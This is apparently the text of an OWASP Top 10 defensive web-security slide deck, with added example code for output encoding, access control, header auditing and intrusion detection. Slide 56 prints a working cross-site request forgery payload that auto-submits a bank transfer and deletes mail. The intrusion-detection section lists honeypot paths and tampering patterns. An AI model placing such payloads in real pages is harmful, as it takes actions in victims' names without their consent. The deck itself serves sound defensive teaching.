      <httpRuntime encoderType="Microsoft.Security.Application.AntiXssEncoder,AntiXssLibrary"/>
    • ASP.Net 4.5 (AntiXss included in this version!)
      <httpRuntime encoderType="System.Web.Security.AntiXss.AntiXssEncoder, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>
    • JSON (MVC): Json.Encode(Model)
    • JavaScript encoding using AntiXss: Encoder.JavaScriptEncode(Model.FirstName)
  • 26. <
  • 27. &lt;
  • 28. OWASP Java Encoder Project
    • No third party libraries or configuration necessary
    • This code was designed for high-availability/high-performance encoding functionality
    • Simple drop-in encoding functionality
    • Performance, ESAPI integration
    • More complete API (uri and uri component encoding, etc) in some regards
    • Java 1.5+
    • Last updated January 30, 2014 (version 1.1.1)
    https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
  • 29. OWASP Java Encoder Project
    Problem: Web Page built in Java JSP is vulnerable to XSS
    Solution:
    1) <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" />
    2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %></textarea>
    3) <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');"> click me </button>
    4) <script type="text/javascript">
         var msg = "<%= Encode.forJavaScriptBlock(message) %>";
         alert(msg);
       </script>
  • 30. OWASP Java Encoder Project
    HTML Contexts: Encode#forHtmlContent(String), Encode#forHtmlAttribute(String), Encode#forHtmlUnquotedAttribute(String)
    XML Contexts: Encode#forXml(String), Encode#forXmlContent(String), Encode#forXmlAttribute(String), Encode#forXmlComment(String), Encode#forCDATA(String)
    CSS Contexts: Encode#forCssString(String), Encode#forCssUrl(String)
    JavaScript Contexts: Encode#forJavaScript(String), Encode#forJavaScriptAttribute(String), Encode#forJavaScriptBlock(String), Encode#forJavaScriptSource(String)
    URI/URL contexts: Encode#forUri(String), Encode#forUriComponent(String)
  • 31. OWASP Java Encoder Project
    <script src="/my-server-side-generated-script"></script>
    class MyServerSideGeneratedScript extends HttpServlet {
        protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
            response.setContentType("text/javascript; charset=UTF-8");
            PrintWriter w = response.getWriter();
            w.println("function() {");
            w.println("  alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');");
            w.println("}");
        }
    }
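The context-specific encoding that slides 22, 29 and 30 describe, as an added JavaScript example (not the OWASP Java Encoder, whose function names are only mirrored here): encoders for the HTML, HTML-attribute, JavaScript-string and URI-component contexts, and the four slide-29 templates rendered with the slide-22 payload to show it stays inert in each.

```javascript
// HTML content context: the five characters that can change HTML structure.
function forHtmlContent(s) {
  return String(s).replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[c]);
}
// For a quoted attribute the same set suffices (an unquoted one would not).
const forHtmlAttribute = forHtmlContent;

// JavaScript string contexts: everything outside a small safe set becomes a
// \xHH or \uHHHH escape, so the output can close neither the JS string nor the
// surrounding attribute or <script> block. That makes one encoder serve both
// the attribute and block cases of slide 29 (Encode#forJavaScriptAttribute
// and Encode#forJavaScriptBlock in the Java Encoder).
function forJavaScript(s) {
  return String(s).replace(/[^A-Za-z0-9 ,._]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? '\\x' + code.toString(16).padStart(2, '0')
                        : '\\u' + code.toString(16).padStart(4, '0');
  });
}
const forJavaScriptAttribute = forJavaScript;
const forJavaScriptBlock = forJavaScript;

// URI component context: percent-encoding, which the platform already provides.
const forUriComponent = encodeURIComponent;

// The four slide-29 templates, rendered server-side with the encoder that
// matches each output context.
function renderSlide29(dataValue, textValue, alertMsg, message) {
  return [
    `<input type="text" name="data" value="${forHtmlAttribute(dataValue)}" />`,
    `<textarea name="text">${forHtmlContent(textValue)}</textarea>`,
    `<button onclick="alert('${forJavaScriptAttribute(alertMsg)}');">click me</button>`,
    `<script type="text/javascript">var msg = "${forJavaScriptBlock(message)}"; alert(msg);</script>`,
  ].join('\n');
}

// How many <script openings the rendered page contains: exactly one (ours)
// is expected, whatever the untrusted inputs held.
function countScriptTags(html) {
  return (html.match(/<script/gi) || []).length;
}
```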
  • 32. Other Encoding Libraries
    • Ruby on Rails
      – http://api.rubyonrails.org/classes/ERB/Util.html
    • Reform Project
      – Java, .NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP
      – https://www.owasp.org/index.php/Category:OWASP_Encoding_Project
    • ESAPI
      – PHP, .NET, Python, Classic ASP, Cold Fusion
      – https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
    • .NET AntiXSS Library
      – http://wpl.codeplex.com/releases/view/80289
  • 33. OWASP HTML Sanitizer Project
    https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
    • Written in Java; lets you include HTML authored by third-parties in your web application while protecting against XSS
    • Has an extensive test suite, and has undergone adversarial security review
      https://code.google.com/p/owasp-java-html-sanitizer/wiki/AttackReviewGroundRules
    • Very easy to use
    • Allows for simple programmatic POSITIVE policy configuration. No XML config.
    • Came out of the Caja project (Google); high performance & low memory utilization
  • 34. Solving real world problems (using OWASP HTML Sanitizer)
    Problem: Web Page is vulnerable to XSS because of untrusted HTML
    Solution:
    PolicyFactory policy = new HtmlPolicyBuilder()
        .allowElements("a")
        .allowUrlProtocols("https")
        .allowAttributes("href").onElements("a")
        .requireRelNofollowOnLinks()
        .build();
    String safeHTML = policy.sanitize(untrustedHTML);
  • 35. Other HTML Sanitizers
    • Pure JavaScript
      – http://code.google.com/p/google-caja/wiki/JsHtmlSanitizer
    • Python
      – https://pypi.python.org/pypi/bleach
    • PHP
      – http://htmlpurifier.org/
      – http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/
    • .NET
      – AntiXSS.getSafeHTML/getSafeHTMLFragment
      – http://htmlagilitypack.codeplex.com/
    • Ruby on Rails
      – http://api.rubyonrails.org/classes/HTML.html
  • 36. DOM-based XSS Defense
    • JavaScript encode and delimit untrusted data as quoted strings
    • Avoid use of HTML rendering methods like innerHTML
      – If you must do this, then sanitize untrusted HTML first
    • Avoid code execution contexts: eval(), setTimeout() or event handlers
    • When possible, treat untrusted data as display text only
    • To build dynamic interfaces, use document.createElement("…"), element.setAttribute("…","value"), element.appendChild(…)
    • Parse JSON with JSON.parse in the browser
  • 37. jQuery
    SAFE use of jQuery: $('#element').text(UNTRUSTED DATA);
    UNSAFE use of jQuery: $('#element').html(UNTRUSTED DATA);
  • 38. OWASP Top 10 - 2013
  • 40. Insecure Direct Object Reference
    Using Fiddler an attacker can change the id and access more information
  • 41. Insecure Direct Object Reference
    We need to change the method signature (the ID is now a GUID), then translate it back to the original, direct reference before going any further:
    public Customer GetCustomer(Guid indirectId) {
        var customerId = IndirectReferenceMap.GetDirectReference(indirectId);
        // ... load and return the customer by customerId
    }
  • 42. OWASP Top 10 - 2013
  • 43. Security Misconfiguration
    Is it really the developers' work? Or the sysadmins?
    If the developers don't know, how will the application security design be complete?
    What about configuring in Dev & Testing environments?
  • 44. Hardening the servers (general)
    • Harden the Operating System
      – BIOS & grub passwords; secure physical access
      – Use multiple partitions (not default install); use options like ro, nosuid, noexec, nodev, --make-runbindable ...
      – Remove all unnecessary packages & drivers (e.g., do you really need Xorg? All those fonts?)
      – Lockdown others (cron, USB detect, IPv6, ctrl-alt-del, ...)
      – SSH password-less login with SSH keygen
      – Enable ufw / iptables / … and a HIDS >> turn on remote logging
      – Oh yeah, regular patches & updates (wait!)
      – Regular backups!
  • 45. Secure Config Tips (Tomcat)
    • Run Tomcat under a Security Manager
      – http://tomcat.apache.org/tomcat-6.0-doc/security-manager-howto.html
      – Modify $CATALINA_BASE/conf/catalina.policy: PropertyPermission, RuntimePermission, FilePermission, SocketPermission, NetPermission, ReflectPermission, …
      – Configure package access (careful! test & debug!) in $CATALINA_BASE/conf/catalina.properties
      – Restart Tomcat:
        $CATALINA_HOME/bin/catalina.sh start -security (Unix)
        %CATALINA_HOME%\bin\catalina start -security (Windows)
  • 46. Secure Config Tips (Tomcat)
    • More tips
      – http://www.tomcatexpert.com/blog/2011/11/02/best-practices-securing-apache-tomcat-7
      – Use Security LifeCycle Listener
      – Lockdown connector interfaces
      – Disable shutdown port?
      – Secure your Web Manager
      – Configure AccessLogValve and RemoteAddrValve
  • 47. Secure Config Tips (JBOSS)
    • Similar principles as Tomcat
      – Use the Java Security Manager
      – Configure policies and access permissions
      – Use Security Realms
      – Disable remote access to JMX
      – Configure TLS (SSL?) carefully: remove old protos, weak crypto, renego, legacy support, etc.
      – Secure the Management interfaces (disable HTTP mgmt?)
      – ...
  • 48. Securing web.config
    5 things to remember here:
    • Error Handling (Enable Custom Errors)
    • Disable TRACE
  • 49. Securing web.config
    • Disable Debugging
    • HTTP Only cookies
  • 50. Securing web.config
    • Session State: UseCookies
  • 51. Encrypting web.config
    • Steps:
      – Go to "C:\Windows\Microsoft.NET\Framework\v4.0.30319" using command prompt.
        aspnet_regiis.exe -pe "connectionStrings" "<path of Web.Config>"
    • Decrypting the web.config
      – Go to the same path
        aspnet_regiis.exe -pd "connectionStrings" "<path of Web.Config>"
  • 54. OWASP Top 10 - 2013
  • 56. Cross Site Request Forgery
    <img src="https://google.com/logo.png">
    <img src="https://google.com/deleteMail/7/confirm=true">
    <form method="POST" action="https://mybank.com/transfer">
      <input type="hidden" name="account" value="23532632"/>
      <input type="hidden" name="amount" value="1000"/>
    </form>
    <script>document.forms[0].submit()</script>
  • 57. How many tabs on your browser?
    How many are already "logged in"? Waiting to update your status, accept your credit card or email your friends
    What if another tab manages to send a request?
    What about others with the "remember me" checkbox? No need for tab to be open... just send a request and they'll happily accept!
  • 59. Using Fiddler we get the JSON
  • 62. 62 To add the anti-forgery tokens to a Razor page, use the HtmlHelper.AntiForgeryToken helper method: @using (Html.BeginForm("Manage", "Account")) { @Html.AntiForgeryToken() } This method adds the hidden form field and also sets the cookie token. <script> @functions { public string TokenHeaderValue() { string cookieToken, formToken; AntiForgery.GetTokens(null, out cookieToken, out formToken); return cookieToken + ":" + formToken; } } $.ajax("api/values", { type: "post", contentType: "application/json", data: { }, // JSON data goes here dataType: "json", headers: { 'RequestVerificationToken': '@TokenHeaderValue()' } }); </script> Anti-Forgery Tokens
  • 63. Anti-Forgery Tokens (server-side validation)
    void ValidateRequestHeader(HttpRequestMessage request) {
        string cookieToken = "";
        string formToken = "";
        IEnumerable<string> tokenHeaders;
        if (request.Headers.TryGetValues("RequestVerificationToken", out tokenHeaders)) {
            string[] tokens = tokenHeaders.First().Split(':');
            if (tokens.Length == 2) {
                cookieToken = tokens[0].Trim();
                formToken = tokens[1].Trim();
            }
        }
        AntiForgery.Validate(cookieToken, formToken);
    }
  • 64. OWASP Top 10 - 2013
  • 65. Access Control [7]
    if ((user.isManager() || user.isAdministrator() || user.isEditor()) && (user.id() != 1132)) {
        //execute action
    }
    How do you change the policy of this code?
  • 66. What is Access Control
    • Authorization: the process where a system determines whether a specific user has access to a resource
    • Permission: represents app behavior only
    • Entitlement: what a user is actually allowed to do
    • Principal/User: who/what you are entitling
    • Implicit Role: named permission, user associated
      – if (user.isRole("Manager"));
    • Explicit Role: named permission, resource associated
      – if (user.isAuthorized("report:view:3324"));
  • 67. Access Control DON'Ts
    • Hard-coded role checks in application code
    • Lack of centralized access control logic
    • Untrusted data driving access control decisions
    • Access control that is "open by default"
    • Lack of addressing horizontal access control in a standardized way (if at all)
    • Access control logic that needs to be manually added to every endpoint in code
    • Access control that is "sticky" per session
    • Access control that requires per-user policy
  • 68. Attacks on Access Control
    • Vertical Access Control Attacks
      – A standard user accessing administration functionality
    • Horizontal Access Control Attacks
      – Same role, but accessing another user's private data
    • Business Logic Access Control Attacks
      – Abuse of one or more linked activities that collectively realize a business objective
  • 69. Impact of poor Access Control
    • Loss of accountability
      – Attackers maliciously execute actions as other users
      – Attackers maliciously execute higher level actions
    • Disclosure of confidential data
      – Compromising admin-level accounts often results in access to users' confidential data
    • Data tampering
      – Privilege levels do not distinguish users who can only view data from users permitted to modify data
  • 70. Apache Shiro http://shiro.apache.org/
    • Apache Shiro is a powerful and easy to use Java security framework
    • Offers developers an intuitive yet comprehensive solution to authentication, authorization, cryptography, and session management
    • Built on sound interface-driven design and OO principles
    • Enables custom behavior
    • Sensible and secure defaults for everything
  • 71. Solving real world Access Control problems
    Problem: Web application needs a secure access control mechanism
    Solution:
    if ( currentUser.isPermitted( "lightsaber:wield" ) ) {
        log.info("You may use a lightsaber ring. Use it wisely.");
    } else {
        log.info("Sorry, lightsaber rings are for schwartz masters only.");
    }
  • 72. Solving real world Access Control problems
    Problem: Web application needs secure access to a specific object
    Solution:
    int winnebagoId = request.getInt("winnebago_id");
    if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId) ) {
        log.info("You are permitted to 'drive' the 'winnebago'. Here are the keys.");
    } else {
        log.info("Sorry, you aren't allowed to drive this winnebago!");
    }
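An added example (not Shiro's code, nor the slides') showing how the "lightsaber:wield" and "winnebago:drive:<id>" checks above work when the policy lives in data rather than in the hard-coded if-chain of slide 65; the permission-string matching follows Shiro's wildcard rules, and the POLICY table and role names are constructed.

```python
"""Added example (not Shiro's code): Shiro-style wildcard permissions with policy kept in data."""

WILDCARD = "*"


def parse(perm):
    """'winnebago:drive:12,17' -> [{'winnebago'}, {'drive'}, {'12', '17'}] (case-folded)."""
    parts = [{p.strip().lower() for p in part.split(",")} for part in perm.split(":")]
    if any("" in part for part in parts):
        raise ValueError("empty part in permission string: %r" % perm)
    return parts


def implies(granted, requested):
    """True when the granted permission string covers the requested one."""
    g, r = parse(granted), parse(requested)
    for i, rpart in enumerate(r):
        if i >= len(g):
            return True  # shorter grant implies the rest: printer:print -> printer:print:lp7200
        if WILDCARD not in g[i] and not rpart <= g[i]:
            return False
    # Grant longer than the request: its remaining parts must all be wildcards.
    return all(WILDCARD in gpart for gpart in g[len(r):])


class Subject:
    """Resolves a user's roles to permission strings via a data-driven policy."""

    def __init__(self, roles, policy):
        self.perms = [p for role in roles for p in policy.get(role, [])]

    def is_permitted(self, requested):
        # Closed by default: no matching grant means no access.
        return any(implies(g, requested) for g in self.perms)


# Constructed policy: changing who may do what edits this table, not the if-chain on slide 65.
POLICY = {
    "schwartz_master": ["lightsaber:*"],
    "driver": ["winnebago:drive:12,17"],
    "admin": ["*"],
}


def can_drive(roles, winnebago_id):
    """The slide-72 check, with the instance id appended to the permission string."""
    return Subject(roles, POLICY).is_permitted("winnebago:drive:" + str(winnebago_id))
```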
  • 73. HTTP: POST vs GET [E1]
    "GET" exposes sensitive authentication information in the URL
      – in web server and proxy server logs
      – in the HTTP Referer header
      – in bookmarks/favorites, often emailed to others
    "POST" places information in the body of the request and not in the URL
    Enforce HTTPS POST for sensitive data transport
  • 74. HTTP Response Headers (security related)
    » X-Frame-Options
    » X-XSS-Protection
    » X-Content-Type-Options
    » Content Security Policy
    » Access-Control-Allow-Origin
    » HTTPS Strict Transport Security
    » Cache-Control / Pragma
  • 75. X-Frame-Options
    Protects you from most classes of Clickjacking
    X-Frame-Options: DENY
    X-Frame-Options: SAMEORIGIN
    X-Frame-Options: ALLOW-FROM uri
  • 76. X-XSS-Protection
    Use the browser's built-in XSS Auditor
    X-XSS-Protection: [0-1](; mode=block)?
    X-XSS-Protection: 1; mode=block
  • 77. X-Content-Type-Options
    Fixes MIME sniffing attacks
    Only applies to IE
    X-Content-Type-Options: nosniff
  • 78. Content Security Policy
    • Anti-XSS W3C standard http://www.w3.org/TR/CSP/
    • Move all inline script and style into external files
    • Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use
    • Define a policy for the site regarding loading of content
    • Chrome version 25 and later (50%)
    • Firefox version 23 and later (30%)
    • Internet Explorer version 10 and later (10%)
  • 79. Disabling the browser cache
    Add the following as part of your HTTP response:
    Cache-Control: no-store, no-cache, must-revalidate
    Expires: -1
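An added example (not from the slides) that checks one response against the header values recommended on slides 74 to 79, including the HSTS max-age and includeSubDomains directives; the WEAK and HARDENED header sets are constructed samples.

```python
"""Added example (not from the slides): check one response against the headers listed above."""
import re


def parse_hsts(value):
    """Return (max_age_seconds, include_subdomains) from a Strict-Transport-Security value."""
    max_age, subs = None, False
    for directive in value.split(";"):
        d = directive.strip()
        m = re.fullmatch(r'max-age\s*=\s*"?(\d+)"?', d, re.IGNORECASE)
        if m:
            max_age = int(m.group(1))
        elif d.lower() == "includesubdomains":
            subs = True
    return max_age, subs


def audit_headers(headers, min_hsts_age=31536000):
    """Return findings for a dict of response headers; an empty list means all checks passed."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    findings = []
    xfo = h.get("x-frame-options", "").upper()
    if xfo not in ("DENY", "SAMEORIGIN") and not xfo.startswith("ALLOW-FROM "):
        findings.append("X-Frame-Options missing or invalid (clickjacking)")
    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing (MIME sniffing)")
    if "content-security-policy" not in h:
        findings.append("Content-Security-Policy missing")
    if "strict-transport-security" not in h:
        findings.append("Strict-Transport-Security missing")
    else:
        age, subs = parse_hsts(h["strict-transport-security"])
        if age is None or age < min_hsts_age:
            findings.append("HSTS max-age below %d seconds" % min_hsts_age)
        if not subs:
            findings.append("HSTS lacks includeSubDomains (add it once every subdomain serves TLS)")
    cc = {d.strip().lower() for d in h.get("cache-control", "").split(",")}
    if not {"no-store", "no-cache"} <= cc:
        findings.append("Cache-Control lacks no-store/no-cache (sensitive pages may be cached)")
    return findings


# Constructed samples: a response with none of the headers, and one set as the slides recommend.
WEAK = {"Cache-Control": "public, max-age=3600"}
HARDENED = {
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "Content-Security-Policy": "default-src 'self'",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Cache-Control": "no-store, no-cache, must-revalidate",
}
```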
  • 80. Application Layer Intrusion Detection [E2]
    • Great detection points to start with
      – Input validation failure server side when client side validation exists
      – Input validation failure server side on non-user editable parameters (hidden fields, checkboxes, radio buttons or select lists)
      – Forced browsing to common attack entry points, e.g. /admin/secretlogin.jsp, or a honeypot URL (a fake path listed in /robots.txt)
  • 81. Application Layer Intrusion Detection
    • Others
      – Blatant SQLi or XSS injection attacks
      – Workflow sequence abuse (e.g. multi-part form in wrong order)
      – Custom business logic (e.g. basket vs catalogue price mismatch)
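An added example (not AppSensor's code) of two of the detection points from slide 80, run over a constructed request log: a non-user-editable field arriving with a value the server never offered, and a request for a honeypot path; the detection labels, field names, paths and threshold are all constructed for this example.

```python
"""Added example (not AppSensor code): two of the detection points above, over a constructed log."""
from collections import Counter

# Constructed: non-user-editable controls the server rendered, with the values it offered.
# A value outside this set cannot come from an unmodified browser form.
FIXED_FIELDS = {"plan": {"basic", "pro"}, "country": {"IE", "US"}, "currency": {"EUR"}}
# Constructed honeypot paths: listed in robots.txt, never linked, never legitimately visited.
HONEYPOT_PATHS = {"/admin/secretlogin.jsp", "/backup/"}
ALERT_THRESHOLD = 2  # detections from one user before escalating (a tuning choice for this example)


def detect(request):
    """Return the (constructed) detection-point labels one request triggers, or []."""
    hits = []
    if request["path"] in HONEYPOT_PATHS:
        hits.append("honeypot-url-requested")
    for name, allowed in FIXED_FIELDS.items():
        value = request["params"].get(name)
        if value is not None and value not in allowed:
            hits.append("fixed-field-tampered:" + name)
    return hits


def users_to_escalate(log):
    """Count detections per user and return those at or above ALERT_THRESHOLD."""
    counts = Counter()
    for req in log:
        counts[req["user"]] += len(detect(req))
    return {user for user, n in counts.items() if n >= ALERT_THRESHOLD}


# Constructed request log: alice behaves normally, bob trips one detection, mallory probes.
SAMPLE_LOG = [
    {"user": "alice", "path": "/checkout", "params": {"plan": "pro", "country": "IE"}},
    {"user": "mallory", "path": "/checkout", "params": {"plan": "pro", "currency": "USD"}},
    {"user": "mallory", "path": "/admin/secretlogin.jsp", "params": {}},
    {"user": "bob", "path": "/checkout", "params": {"plan": "basic", "country": "US"}},
    {"user": "bob", "path": "/checkout", "params": {"plan": "basic", "country": "XX"}},
]
```

A single detection (bob) stays below the threshold, while repeated detections from one user (mallory) are escalated.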
  • 82. OWASP AppSensor (Java)
    • Project and mailing list
      https://www.owasp.org/index.php/OWASP_AppSensor_Project
    • Four-page briefing, Crosstalk, Journal of Defense Software Engineering
      http://www.crosstalkonline.org/storage/issue-archives/2011/201109/201109-Watson.pdf
  • 83. Encryption in transit [E3]
    • Confidentiality, Integrity (in transit) and Authenticity
      – Authentication credentials and session identifiers must be encrypted in transit via HTTPS/SSL
      – Starting when the login form is rendered until logout is complete
    • HTTPS configuration best practices
      – https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
    • HSTS (Strict Transport Security)
      – http://www.youtube.com/watch?v=zEV3HOuM_Vw
      – Strict-Transport-Security: max-age=31536000
    • Certificate Pinning
      – https://www.owasp.org/index.php/Pinning_Cheat_Sheet
  • 84. Strict Transport Security (HSTS)
    Strict-Transport-Security: max-age=10000000
    Do all of your subdomains support SSL?
    Strict-Transport-Security: max-age=10000000; includeSubdomains
    // in global.asax
    protected void Application_BeginRequest(Object sender, EventArgs e) {
        switch (Request.Url.Scheme) {
            case "https":
                Response.AddHeader("Strict-Transport-Security", "max-age=31536000");
                break;
            case "http":
                var path = "https://" + Request.Url.Host + Request.Url.PathAndQuery;
                Response.Status = "301 Moved Permanently";
                Response.AddHeader("Location", path);
                break;
        }
    }
  • 85. Certificate Pinning
    • What is pinning
      – Pinning is a key continuity scheme
      – Detects when an imposter with a fake but CA-validated certificate attempts to act like the real server
    • 2 types of pinning
      • Carry around a copy of the server's public key
        – Great if you are distributing a dedicated client-server application, since you know the server's certificate or public key in advance
      • Note the server's public key on first use (Trust-on-First-Use, TOFU)
        – Useful when no a priori knowledge exists, such as SSH or a browser
    • https://www.owasp.org/index.php/Pinning_Cheat_Sheet
  • 86. File Upload Security [E4]
    • Upload Verification
      – Filename and size validation + antivirus
    • Upload Storage
      – Use only trusted filenames + separate domain
    • Beware of "special" files
      – "crossdomain.xml" or "clientaccesspolicy.xml"
    • Image Upload Verification
      – Enforce proper image size limits
      – Use image rewriting libraries
      – Set the extension of the stored image to be a valid image extension
      – Ensure the detected content type of the image is safe
    • Generic Upload Verification
      – Ensure the decompressed size of the file < maximum size
      – Ensure that an uploaded archive matches the type expected (zip, rar)
      – Ensure structured uploads such as an add-on follow the proper standard